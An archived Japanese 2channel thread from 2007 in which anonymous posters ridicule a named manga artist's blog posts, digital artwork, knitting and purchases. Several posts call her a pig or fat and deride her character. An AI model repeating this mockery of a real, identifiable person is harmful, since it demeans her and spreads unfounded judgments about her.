141 :花と名無しさん:2007/01/21(日) 14:32:08 ID:???0
最近はもうそんなに、西村知美とは親交がないのかな?
てーか、相変わらず自分の書いた文章を読み直さないんだな。


142 :花と名無しさん:2007/01/21(日) 14:37:57 ID:???0
向こうに子供が出来たから忙しくなって
一緒に食事行ったりはなくなったんでそ。旦那の店もつぶれたし。

143 :花と名無しさん:2007/01/21(日) 14:55:30 ID:???0
え?雇われ店長かなんかだったんじゃないの?


144 :連投スマソ:2007/01/21(日) 14:57:55 ID:???0
>小説で読めるのはいいことだと思います。

って、なんなんだ、その上から物言いは。
どれだけ自分が下っ端か分かってんのか豚。
「小説で読めるのは嬉しいです」ぐらいにしとけよ豚。



145 :花と名無しさん:2007/01/21(日) 21:30:02 ID:???0
>144
何の根拠もなく、彼ら一流創作者と自分が肩を並べているとでも
思ってるんでね?他意はないかもしれんが、敬意が感じられないよね。

ところで、フロアランプ…悩むほどの値段かなあ?
ウチの中の物に費やすお金(の比重)は、個人の価値観も
あって、あんまり断定的には言えないんだけど、なんか
ビンボ臭いような。
それにしても、あのアフェリの貼りっぷりはどうよ。
ほんとは「あの野間美由紀が推薦!」とか…そういう風に
話題になってみたいんだろうな、この人。無理だが

146 :花と名無しさん:2007/01/21(日) 22:44:08 ID:???0
野間?だれそれ?、で終わりw

147 :花と名無しさん:2007/01/22(月) 01:47:58 ID:???0
先生、貧乏なら電球の球だけ蛍光灯タイプに変えるってことも出来ますよ。


148 :花と名無しさん:2007/01/22(月) 21:29:29 ID:???O
のまたん、そのペン軸がどれ位入手しにくいか知らんが
普段の行いが行いだから
不要品処分で送りつけるように見えるぞ。

149 :花と名無しさん:2007/01/22(月) 22:11:26 ID:???0
私はデジタルに移行してしまったので

……移行しない方が少しはマシな作品がまだまだ残せてたかもしれないのにね。
パズルゲームが歯科の待合室にあったので久しぶりに読んだけど
パソコン通信を始めましたっていう時期と話も絵もぐだぐだになっていった時期が
見事に重なってるんだね。
改めて豚に真珠だったんだなと感じてしまった。
って豚に失礼だった。豚さんごめん。

150 :花と名無しさん:2007/01/22(月) 23:45:07 ID:???0
いや、もう今日のノマタン日記は、全方面全方位に渡って
おこがましいつか、身の程知らずっつか、己の身の丈を
いい加減に知れよ、みたいな内容だった。
このポンチ絵描きは、何様のつもりなんすか?

151 :花と名無しさん:2007/01/23(火) 05:43:53 ID:???O
豚の乱

152 :花と名無しさん:2007/01/23(火) 06:39:03 ID:???0
いくらデジタル移行したとはいえ、「もう必要ありません」って…。
誰か野間家の電気を止めてくれw

153 :花と名無しさん:2007/01/23(火) 07:31:28 ID:???O
>149
デブにありがちな自制心の無さから
パソ通にハマりすぎて、
しっかり技術を身に着けないうちに
見切り発車したんだろうね。
自分に都合のいい性格も災いして
デシタル=クオリティが高いと信じてるし。

154 :花と名無しさん:2007/01/23(火) 08:20:43 ID:???O
浦沢先生担当者「飽太で描いてるノマさんからペン軸もらったよ」
浦沢先生「誰それ?」
担当者「あと毛糸で作ったなんかが添えられてるよ」
浦沢先生「…」

155 :花と名無しさん:2007/01/23(火) 09:33:30 ID:???0
ペン軸ごとゴミ箱にw

156 :花と名無しさん:2007/01/23(火) 19:47:35 ID:???0
デジタル移行してると堂々と言うならその真っ白な背景をどうにかしろって。
どうせなら背景全部にご自分で撮った写真をそのまま貼り付けてはいかがでしょうかw

157 :花と名無しさん:2007/01/23(火) 21:45:47 ID:???0
「室内のシーンが多いから」って理由で、家屋の設計ソフトを
買った漫画家がいたなー。

一度データで家一軒分のデータを作ってしまえば、アングルも
パースも自由自在。
もともと機械オタクでマック系の新型が出ると飛びついて買うような
人だけど、漫画家としては有効な買い物してたって感じだったな。

それくらいやんないと、「完全にデジタルに移行」とは豪語できない
ような気がする。

158 :花と名無しさん:2007/01/24(水) 00:08:23 ID:???0
なんかさー漫画のデジタル化にしろ、編み物趣味にしろ、
結果的に似たところがあるよね、ノマタン。
生半可な知識と中途半端なテクニックしかないのに、
「自己流で自分はうまくやってる」みたいに思ってるとこ。
謙虚に、他人から教わるってことが出来ない人だからなあ

159 :花と名無しさん:2007/01/24(水) 01:56:31 ID:???0
あのポンポンの付いた帽子、ノマたんが被るの?

160 :花と名無しさん:2007/01/24(水) 07:28:06 ID:???0
下の帽子、またこの配色w
つか、この幅でこの深さだと
実際に被ったときにブカブカか浅すぎるかのどっちかじゃない?

それに“執念深い”をカッコつけて書いてるけど
そんなに執念深いならなぜ結果が出ないんだろうね。
本業にしろ漫画にしろ。
以前bbsで“無駄に負けず嫌いですね”とかって書かれたとき
「負けず嫌いじゃなければこの仕事はやってけませんからっ!」って
禿げしく反論してたことあったけど、
あの時も、そう言えるような漫画か?と思った。
ほんと成長しないね。



161 :花と名無しさん:2007/01/24(水) 08:03:51 ID:???0
相変わらず網目がグダグダですね。
上の写真、裏側の真ん中ちょい左あたりが特に。

162 :花と名無しさん:2007/01/24(水) 09:19:29 ID:???0
上の帽子、ダンジョンのボス模様?

163 :花と名無しさん:2007/01/24(水) 12:02:09 ID:???0
ファミコン時代のドラクエダンジョンを見てるようだ

164 :花と名無しさん:2007/01/24(水) 13:26:05 ID:???0
>>158
端的に言うと、「向上心がない」んだよ。

165 :花と名無しさん:2007/01/24(水) 13:44:10 ID:???0
虚栄心は有るんだけどねえ。

166 :花と名無しさん:2007/01/24(水) 15:46:13 ID:???0
>164
野間自身はあるつもりなんでしょ。
知識欲に貪欲でいるつもりっぽいじゃない?
野間は一言で言えば 自 分 を 判 っ て い な い んだと思う。

167 :花と名無しさん:2007/01/24(水) 17:42:26 ID:???O
編み物で思い出すが、パズル中学で左利きの女の子が編み物する話、
香月と美女が持ち主がわからない編み物を見て
「あまり上手くないね」と言うが
今思うともにょるなぁ。いくらキャラの台詞でも。

168 :花と名無しさん:2007/01/24(水) 17:47:40 ID:???0
22日の日記の“お仕事ウィーク”、
どう考えても編み物やってたとしか思えないんですがw

169 :花と名無しさん:2007/01/24(水) 21:54:16 ID:???0
>「これだけお金をかけるんだから、絶対に使いこなして元を取る!」
>と固く決心したんですが、元を取る以上のことができたと
>思っているので結果的には安い買い物ですっ。

ハラが茶沸かすぜ

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)